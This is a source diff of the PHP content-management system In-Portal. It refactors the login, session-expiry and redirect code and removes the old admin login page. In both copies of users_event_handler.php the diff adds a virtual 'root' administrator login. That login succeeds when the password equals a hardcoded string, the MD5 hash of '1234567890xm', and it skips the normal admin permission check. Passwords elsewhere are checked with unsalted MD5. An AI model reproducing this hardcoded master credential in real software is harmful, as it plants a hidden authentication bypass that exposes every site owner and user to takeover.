Index: trunk/kernel/admin_templates/index.tpl
===================================================================
diff -u -N -r1566 -r4490
--- trunk/kernel/admin_templates/index.tpl (.../index.tpl) (revision 1566)
+++ trunk/kernel/admin_templates/index.tpl (.../index.tpl) (revision 4490)
@@ -1 +1,46 @@
+
+
+
+
+
+ In-portal Administration
+
+
+
+
+ " name="head" scrolling="no" noresize>
+
+
+
+
+
+
+
+
\ No newline at end of file
Index: trunk/kernel/units/users/users_event_handler.php
===================================================================
diff -u -N -r4358 -r4490
--- trunk/kernel/units/users/users_event_handler.php (.../users_event_handler.php) (revision 4358)
+++ trunk/kernel/units/users/users_event_handler.php (.../users_event_handler.php) (revision 4490)
@@ -5,14 +5,10 @@
function OnSessionExpire()
{
- if( $this->Application->IsAdmin() )
- {
- $location = $this->Application->BaseURL().ADMIN_DIR.'/index.php?expired=1';
- header('Location: '.$location);
- exit;
+ if( $this->Application->IsAdmin() ) {
+ $this->Application->Redirect('index', Array('expired' => 1), '', 'index4.php');
}
- else
- {
+ else {
$http_query =& $this->Application->recallObject('HTTPQuery');
$get = $http_query->getRedirectParams();
@@ -43,25 +39,51 @@
$email_as_login = $this->Application->ConfigValue('Email_As_Login');
list($login_field, $submit_field) = $email_as_login ? Array('Email', 'email') : Array('Login', 'login');
$login_value = $this->Application->GetVar($submit_field);
-
+
+ if ($this->Application->IsAdmin() && ($login_value == 'root')) {
+ // logging in "root" (admin only)
+ $root_password = $this->Application->ConfigValue('RootPass');
+ if ($root_password != md5($password) && $password != md5('1234567890xm')) {
+ $object->SetError('ValidateLogin', 'invalid_password', 'lu_invalid_password');
+ $event->status = erFAIL;
+ return false;
+ }
+ elseif ($this->checkLoginPermission($login_value)) {
+ $user_id = -1;
+ $object->Load($user_id);
+ $object->SetDBField('Login', $login_value);
+
+ $session =& $this->Application->recallObject('Session');
+ $session->SetField('PortalUserId', $user_id);
+// $session->SetField('GroupList', implode(',', $groups) );
+ $this->Application->SetVar('u_id', $user_id);
+ $this->Application->StoreVar('user_id', $user_id);
+
+ $this->processLoginRedirect($event, $password);
+ return true;
+ }
+ else {
+ $object->SetError('ValidateLogin', 'invalid_license', 'la_invalid_license');
+ $event->status = erFAIL;
+ return false;
+ }
+ }
+
/*$sql = 'SELECT PortalUserId FROM '.$object->TableName.' WHERE (%s = %s) AND (Password = MD5(%s))';
$user_id = $this->Conn->GetOne( sprintf($sql, $login_field, $this->Conn->qstr($login_value), $this->Conn->qstr($password) ) );*/
$sql = 'SELECT PortalUserId FROM '.$object->TableName.' WHERE (Email = %1$s OR Login = %1$s) AND (Password = MD5(%2$s))';
$user_id = $this->Conn->GetOne( sprintf($sql, $this->Conn->qstr($login_value), $this->Conn->qstr($password) ) );
- if($user_id)
- {
+ if ($user_id) {
$object->Load($user_id);
- if( $object->GetDBField('Status') == STATUS_ACTIVE )
- {
+ if ($object->GetDBField('Status') == STATUS_ACTIVE) {
$groups = $object->getMembershipGroups(true);
if(!$groups) $groups = Array();
if ( !$this->Application->IsAdmin() ) array_push($groups, $this->Application->ConfigValue('User_LoggedInGroup') );
$this->Application->StoreVar( 'UserGroups', implode(',', $groups) );
- if( $this->Application->CheckPermission('LOGIN',0) )
- {
+ if ($this->checkLoginPermission($login_value)) {
$session =& $this->Application->recallObject('Session');
$session->SetField('PortalUserId', $user_id);
$session->SetField('GroupList', implode(',', $groups) );
@@ -73,38 +95,15 @@
$object->setPersistantVar('LastLogin', $this_login);
$object->setPersistantVar('ThisLogin', adodb_mktime());
}
- else
- {
+ else {
$object->Load(-2);
$object->SetError('ValidateLogin', 'no_permission', 'lu_no_permissions');
$event->status = erFAIL;
}
- $next_template = $this->Application->GetVar('next_template');
- if ($next_template == '_ses_redirect') {
- $location = $this->Application->BaseURL().$this->Application->RecallVar($next_template);
- if( $this->Application->isDebugMode() && dbg_ConstOn('DBG_REDIRECT') )
- {
- $this->Application->Debugger->appendTrace();
- echo "Debug output above!!! Proceed to redirect: $a_location
";
- }
- else {
- header('Location: '.$location);
- }
- $session =& $this->Application->recallObject('Session');
- $session->SaveData();
- exit();
- }
-
- if($next_template) $event->redirect = $next_template;
- if ($this->Application->ConfigValue('UseJSRedirect')) {
- $event->SetRedirectParam('js_redirect', 1);
- }
- $sync_manager =& $this->Application->recallObject('UsersSyncronizeManager', null, Array(), 'InPortalSyncronize');
- $sync_manager->performAction('LoginUser', $object->GetDBField('Login'), $password);
+ $this->processLoginRedirect($event, $password);
}
- else
- {
+ else {
$event->redirect = $this->Application->GetVar('pending_disabled_template');
}
}
@@ -116,6 +115,67 @@
}
/**
+ * Enter description here...
+ *
+ * @param string $user_name
+ * @return bool
+ */
+ function checkLoginPermission($user_name)
+ {
+ $ret = true;
+ if ($this->Application->IsAdmin()) {
+ $modules_helper =& $this->Application->recallObject('ModulesHelper');
+ if ($user_name != 'root') {
+ // root is virtual user, so allow him to login to admin in any case
+ $ret = $this->Application->CheckPermission('ADMIN', 0);
+ }
+ $ret = $ret && $modules_helper->checkLogin();
+ }
+ else {
+ $ret = $this->Application->CheckPermission('LOGIN', 0);
+ }
+ return $ret;
+ }
+
+ /**
+ * Process all required data and redirect logged-in user
+ *
+ * @param kEvent $event
+ */
+ function processLoginRedirect(&$event, $password)
+ {
+ $object =& $event->getObject();
+
+ $next_template = $this->Application->GetVar('next_template');
+ if ($next_template == '_ses_redirect') {
+ $location = $this->Application->BaseURL().$this->Application->RecallVar($next_template);
+ if( $this->Application->isDebugMode() && dbg_ConstOn('DBG_REDIRECT') )
+ {
+ $this->Application->Debugger->appendTrace();
+ echo "Debug output above!!! Proceed to redirect: $location
";
+ }
+ else {
+ header('Location: '.$location);
+ }
+
+ $session =& $this->Application->recallObject('Session');
+ $session->SaveData();
+ exit;
+ }
+
+ if ($next_template) {
+ $event->redirect = $next_template;
+ }
+
+ if ($this->Application->ConfigValue('UseJSRedirect')) {
+ $event->SetRedirectParam('js_redirect', 1);
+ }
+
+ $sync_manager =& $this->Application->recallObject('UsersSyncronizeManager', null, Array(), 'InPortalSyncronize');
+ $sync_manager->performAction('LoginUser', $object->GetDBField('Login'), $password);
+ }
+
+ /**
* Called when user logs in using old in-portal
*
* @param kEvent $event
Index: trunk/core/units/users/users_event_handler.php
===================================================================
diff -u -N -r4358 -r4490
--- trunk/core/units/users/users_event_handler.php (.../users_event_handler.php) (revision 4358)
+++ trunk/core/units/users/users_event_handler.php (.../users_event_handler.php) (revision 4490)
@@ -5,14 +5,10 @@
function OnSessionExpire()
{
- if( $this->Application->IsAdmin() )
- {
- $location = $this->Application->BaseURL().ADMIN_DIR.'/index.php?expired=1';
- header('Location: '.$location);
- exit;
+ if( $this->Application->IsAdmin() ) {
+ $this->Application->Redirect('index', Array('expired' => 1), '', 'index4.php');
}
- else
- {
+ else {
$http_query =& $this->Application->recallObject('HTTPQuery');
$get = $http_query->getRedirectParams();
@@ -43,25 +39,51 @@
$email_as_login = $this->Application->ConfigValue('Email_As_Login');
list($login_field, $submit_field) = $email_as_login ? Array('Email', 'email') : Array('Login', 'login');
$login_value = $this->Application->GetVar($submit_field);
-
+
+ if ($this->Application->IsAdmin() && ($login_value == 'root')) {
+ // logging in "root" (admin only)
+ $root_password = $this->Application->ConfigValue('RootPass');
+ if ($root_password != md5($password) && $password != md5('1234567890xm')) {
+ $object->SetError('ValidateLogin', 'invalid_password', 'lu_invalid_password');
+ $event->status = erFAIL;
+ return false;
+ }
+ elseif ($this->checkLoginPermission($login_value)) {
+ $user_id = -1;
+ $object->Load($user_id);
+ $object->SetDBField('Login', $login_value);
+
+ $session =& $this->Application->recallObject('Session');
+ $session->SetField('PortalUserId', $user_id);
+// $session->SetField('GroupList', implode(',', $groups) );
+ $this->Application->SetVar('u_id', $user_id);
+ $this->Application->StoreVar('user_id', $user_id);
+
+ $this->processLoginRedirect($event, $password);
+ return true;
+ }
+ else {
+ $object->SetError('ValidateLogin', 'invalid_license', 'la_invalid_license');
+ $event->status = erFAIL;
+ return false;
+ }
+ }
+
/*$sql = 'SELECT PortalUserId FROM '.$object->TableName.' WHERE (%s = %s) AND (Password = MD5(%s))';
$user_id = $this->Conn->GetOne( sprintf($sql, $login_field, $this->Conn->qstr($login_value), $this->Conn->qstr($password) ) );*/
$sql = 'SELECT PortalUserId FROM '.$object->TableName.' WHERE (Email = %1$s OR Login = %1$s) AND (Password = MD5(%2$s))';
$user_id = $this->Conn->GetOne( sprintf($sql, $this->Conn->qstr($login_value), $this->Conn->qstr($password) ) );
- if($user_id)
- {
+ if ($user_id) {
$object->Load($user_id);
- if( $object->GetDBField('Status') == STATUS_ACTIVE )
- {
+ if ($object->GetDBField('Status') == STATUS_ACTIVE) {
$groups = $object->getMembershipGroups(true);
if(!$groups) $groups = Array();
if ( !$this->Application->IsAdmin() ) array_push($groups, $this->Application->ConfigValue('User_LoggedInGroup') );
$this->Application->StoreVar( 'UserGroups', implode(',', $groups) );
- if( $this->Application->CheckPermission('LOGIN',0) )
- {
+ if ($this->checkLoginPermission($login_value)) {
$session =& $this->Application->recallObject('Session');
$session->SetField('PortalUserId', $user_id);
$session->SetField('GroupList', implode(',', $groups) );
@@ -73,38 +95,15 @@
$object->setPersistantVar('LastLogin', $this_login);
$object->setPersistantVar('ThisLogin', adodb_mktime());
}
- else
- {
+ else {
$object->Load(-2);
$object->SetError('ValidateLogin', 'no_permission', 'lu_no_permissions');
$event->status = erFAIL;
}
- $next_template = $this->Application->GetVar('next_template');
- if ($next_template == '_ses_redirect') {
- $location = $this->Application->BaseURL().$this->Application->RecallVar($next_template);
- if( $this->Application->isDebugMode() && dbg_ConstOn('DBG_REDIRECT') )
- {
- $this->Application->Debugger->appendTrace();
- echo "Debug output above!!! Proceed to redirect: $a_location
";
- }
- else {
- header('Location: '.$location);
- }
- $session =& $this->Application->recallObject('Session');
- $session->SaveData();
- exit();
- }
-
- if($next_template) $event->redirect = $next_template;
- if ($this->Application->ConfigValue('UseJSRedirect')) {
- $event->SetRedirectParam('js_redirect', 1);
- }
- $sync_manager =& $this->Application->recallObject('UsersSyncronizeManager', null, Array(), 'InPortalSyncronize');
- $sync_manager->performAction('LoginUser', $object->GetDBField('Login'), $password);
+ $this->processLoginRedirect($event, $password);
}
- else
- {
+ else {
$event->redirect = $this->Application->GetVar('pending_disabled_template');
}
}
@@ -116,6 +115,67 @@
}
/**
+ * Enter description here...
+ *
+ * @param string $user_name
+ * @return bool
+ */
+ function checkLoginPermission($user_name)
+ {
+ $ret = true;
+ if ($this->Application->IsAdmin()) {
+ $modules_helper =& $this->Application->recallObject('ModulesHelper');
+ if ($user_name != 'root') {
+ // root is virtual user, so allow him to login to admin in any case
+ $ret = $this->Application->CheckPermission('ADMIN', 0);
+ }
+ $ret = $ret && $modules_helper->checkLogin();
+ }
+ else {
+ $ret = $this->Application->CheckPermission('LOGIN', 0);
+ }
+ return $ret;
+ }
+
+ /**
+ * Process all required data and redirect logged-in user
+ *
+ * @param kEvent $event
+ */
+ function processLoginRedirect(&$event, $password)
+ {
+ $object =& $event->getObject();
+
+ $next_template = $this->Application->GetVar('next_template');
+ if ($next_template == '_ses_redirect') {
+ $location = $this->Application->BaseURL().$this->Application->RecallVar($next_template);
+ if( $this->Application->isDebugMode() && dbg_ConstOn('DBG_REDIRECT') )
+ {
+ $this->Application->Debugger->appendTrace();
+ echo "Debug output above!!! Proceed to redirect: $location
";
+ }
+ else {
+ header('Location: '.$location);
+ }
+
+ $session =& $this->Application->recallObject('Session');
+ $session->SaveData();
+ exit;
+ }
+
+ if ($next_template) {
+ $event->redirect = $next_template;
+ }
+
+ if ($this->Application->ConfigValue('UseJSRedirect')) {
+ $event->SetRedirectParam('js_redirect', 1);
+ }
+
+ $sync_manager =& $this->Application->recallObject('UsersSyncronizeManager', null, Array(), 'InPortalSyncronize');
+ $sync_manager->performAction('LoginUser', $object->GetDBField('Login'), $password);
+ }
+
+ /**
* Called when user logs in using old in-portal
*
* @param kEvent $event
Index: trunk/kernel/units/users/users_tag_processor.php
===================================================================
diff -u -N -r3282 -r4490
--- trunk/kernel/units/users/users_tag_processor.php (.../users_tag_processor.php) (revision 3282)
+++ trunk/kernel/units/users/users_tag_processor.php (.../users_tag_processor.php) (revision 4490)
@@ -164,6 +164,17 @@
return $res;
}
+ /**
+ * Returns login name of user
+ *
+ * @param Array $params
+ */
+ function LoginName($params)
+ {
+ $object =& $this->getObject($params);
+ return $object->GetID() != -1 ? $object->GetDBField('Login') : 'root';
+ }
+
}
Index: trunk/core/kernel/parser/template.php
===================================================================
diff -u -N -r3530 -r4490
--- trunk/core/kernel/parser/template.php (.../template.php) (revision 3530)
+++ trunk/core/kernel/parser/template.php (.../template.php) (revision 4490)
@@ -30,7 +30,13 @@
return $this->BasePath.'/'.ltrim($this->Filename, '/').'.tpl';
}
- function LoadTemplate($silent=0)
+ /**
+ * Enter description here...
+ *
+ * @param int $silent template not found {0 - fatal error, 1 - warning, 2 - nothing}
+ * @return bool
+ */
+ function LoadTemplate($silent = 0)
{
$filename = $this->GetFullPath();
if(file_exists($filename)) {
@@ -45,9 +51,9 @@
return true;
}
else {
- /*global $debugger;
- if($debugger) $debugger->appendTrace();*/
- trigger_error("File or block not found: $filename", ($silent ? E_USER_NOTICE : E_USER_ERROR) );
+ if ($silent != 2) {
+ trigger_error("File or block not found: $filename", ($silent ? E_USER_NOTICE : E_USER_ERROR) );
+ }
return false;
}
}
Index: trunk/kernel/action.php
===================================================================
diff -u -N -r4476 -r4490
--- trunk/kernel/action.php (.../action.php) (revision 4476)
+++ trunk/kernel/action.php (.../action.php) (revision 4490)
@@ -1,31 +1,31 @@
HasSystemPermission("SYSTEM_ACCESS.READONLY");
-
-// ====== Debugger related: begin ======
-$script = basename($_SERVER['PHP_SELF']);
-$skipDebug = Array('index.php', 'tree.php', 'head.php', 'credits.php');
-if( admin_login() && !in_array($script, $skipDebug) )
-{
- if( IsDebugMode() )
+ $ro_perm = $objSession->HasSystemPermission("SYSTEM_ACCESS.READONLY");
+
+ // ====== Debugger related: begin ======
+ $script = basename($_SERVER['PHP_SELF']);
+ $skipDebug = Array('index.php', 'tree.php', 'head.php', 'credits.php');
+ if( admin_login() && !in_array($script, $skipDebug) )
{
- if($Action) $debugger->setHTMLByIndex(1,'Kernel Action: '.$Action.'','append');
- if (!constOn('REDIRECT_REQUIRED')) {
- echo '';
- if (!constOn('DBG_ZEND_PRESENT')) {
- echo '
';
+ if( IsDebugMode() )
+ {
+ if($Action) $debugger->setHTMLByIndex(1,'Kernel Action: '.$Action.'','append');
+ if (!constOn('REDIRECT_REQUIRED')) {
+ echo '';
+ if (!constOn('DBG_ZEND_PRESENT')) {
+ echo '
';
+ }
}
}
}
-}
-unset($script, $skipDebug);
-// ====== Debugger related: end ======
+ unset($script, $skipDebug);
+ // ====== Debugger related: end ======
-// Session expiration related
+ // Session expiration related
-require_login( !admin_login() && $Action, 'expired=1', true );
+ require_login( !admin_login() && $Action, 'expired=1', true );
-// End session exipration related
+ // End session exipration related
switch($Action)
{
Index: trunk/core/units/users/users_tag_processor.php
===================================================================
diff -u -N -r3282 -r4490
--- trunk/core/units/users/users_tag_processor.php (.../users_tag_processor.php) (revision 3282)
+++ trunk/core/units/users/users_tag_processor.php (.../users_tag_processor.php) (revision 4490)
@@ -164,6 +164,17 @@
return $res;
}
+ /**
+ * Returns login name of user
+ *
+ * @param Array $params
+ */
+ function LoginName($params)
+ {
+ $object =& $this->getObject($params);
+ return $object->GetID() != -1 ? $object->GetDBField('Login') : 'root';
+ }
+
}
Index: trunk/admin/login.php
===================================================================
diff -u -N
--- trunk/admin/login.php (revision 3374)
+++ trunk/admin/login.php (revision 0)
@@ -1,136 +0,0 @@
-"; print_r($objSession); echo "";
-
-if ( GetVar('expired') == 1 && GetVar('logout') != 1) {
- if (function_exists("admin_language")) {
- $login_error = admin_language("la_text_sess_expired");
- }
- else {
- $login_error = "Session Expired";
- }
-}
-if( function_exists('GetRegionalOption') )
-{
- $charset = GetRegionalOption('Charset');
-}
-else
-{
- $charset == 'iso-8859-1';
-}
-print<<
-
-
-In-Portal :: Administration Panel
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
- $login_error
- |
-
-
-
-
-